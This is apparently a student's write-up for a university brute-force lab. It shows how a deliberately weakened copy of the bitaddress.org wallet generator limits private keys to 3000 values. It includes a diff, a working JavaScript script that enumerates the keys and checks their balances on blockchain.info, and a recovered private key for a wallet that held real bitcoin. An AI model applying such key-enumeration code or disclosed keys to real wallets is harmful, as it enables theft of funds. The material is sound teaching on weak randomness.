# Bitcoin task

forstluk@fel.cvut.cz

The goal of this lab is to get familiar with blockchain (and bitcoin as the famous example of this technology) and brute force attacks.

There exists a fairly popular site https://www.bitaddress.org which allows you to generate new bitcoin addresses in your browser. For the purposes of this homework we have modified the site and introduced a vulnerabiliy and upload the vulnerable code here.

The task is to find a private key for existing bitcoin wallet with real money on it. Based on your personal preferences you can follow either of following stories.


## Solution

First, I needed to find out, what is the difference betwen the original and our modified site.

So I downloaded the site
```bash
wget -O original.html https://bitaddress.org/bitaddress.org-v3.3.0-SHA256-dec17c07685e1870960903d8f58090475b25af946fe95a734f88408cef4aa194.html
```
And then run diff
```bash
diff -w bitaddress.org.html original.html
5654,5657c5654
< 			this.priv = ECDSA.getBigRandom(n)
< 				.mod(BigInteger.valueOf(3000))
< 				.multiply(new BigInteger("424242424242424244242424244242424242424"))
< 				.add(new BigInteger("SoLongAndThanksForAllTheFish"));
---
> 			this.priv = ECDSA.getBigRandom(n);
6627,6628c6624
< 		<div id="tagline">Open Source JavaScript Client-Side Bitcoin Wallet Generator. <br>
< 			<b>WARNING: Modified to contain a vulnerability that can be exploited as an exercise.</b></div>
---
> 		<div id="tagline">Open Source JavaScript Client-Side Bitcoin Wallet Generator</div>
```


What we can see from that - the space, of generated private keys is limited to `3000` differet keys. 3000 is not a big number, we can safely bruteforce that (generate all private keys, that can be generated by this code).

So I wrote this JS snippet and put it into the browser:

```javascript
function extractData(total_space) {
    const promises = [];
    for (let index = 0; index < total_space; index++) {
        const res = BigInteger.valueOf(index)
            .multiply(new BigInteger("424242424242424244242424244242424242424"))
            .add(new BigInteger("SoLongAndThanksForAllTheFish"));

        const key = new Bitcoin.ECKey(res);
        key.setCompressed(true);
        const publicKey = key.getBitcoinAddress();
        const privateKey = key.getBitcoinWalletImportFormat();

        const promise = fetch('https://blockchain.info/q/getreceivedbyaddress/' + publicKey +'?confirmations=3')
            .then(x => x.json())
            .then(received => ({
                "publicKey": publicKey,
                "privateKey": privateKey,
                received
            }))
            .then(payload => {
                if(payload.received != 0) {
                    console.log(payload)
                }
                return payload
            })

        promises.push(promise);
    }
    return Promise.all(promises)
}
```

And then we put this function to browser console, when running modified site:
```javascript
let a = extractData(3000).then(x => console.log('done!', x))
```
After some time (it really took a lot of time, as I was doing HTTP requests as well as generating 3000 keys) I found a single wallet with non zero received bitcoins!

```json
{
    "publicKey":"1E2mSN7MXVuS4ecafhTLtaokf5RixcYUEU", 
    "privateKey":"KwDiBf89QgGbjEhKnhXJuY4GUMKjkbiQLBXrUaWStqmWnp3XBMte",
    "received": 542408
}
```

Which is not 542k BTC, but rather `0.00542408` BTC. Sadly when I checked the ballance https://www.blockchain.com/btc/address/1E2mSN7MXVuS4ecafhTLtaokf5RixcYUEU, the wallet was empty. Somebody was faster then me.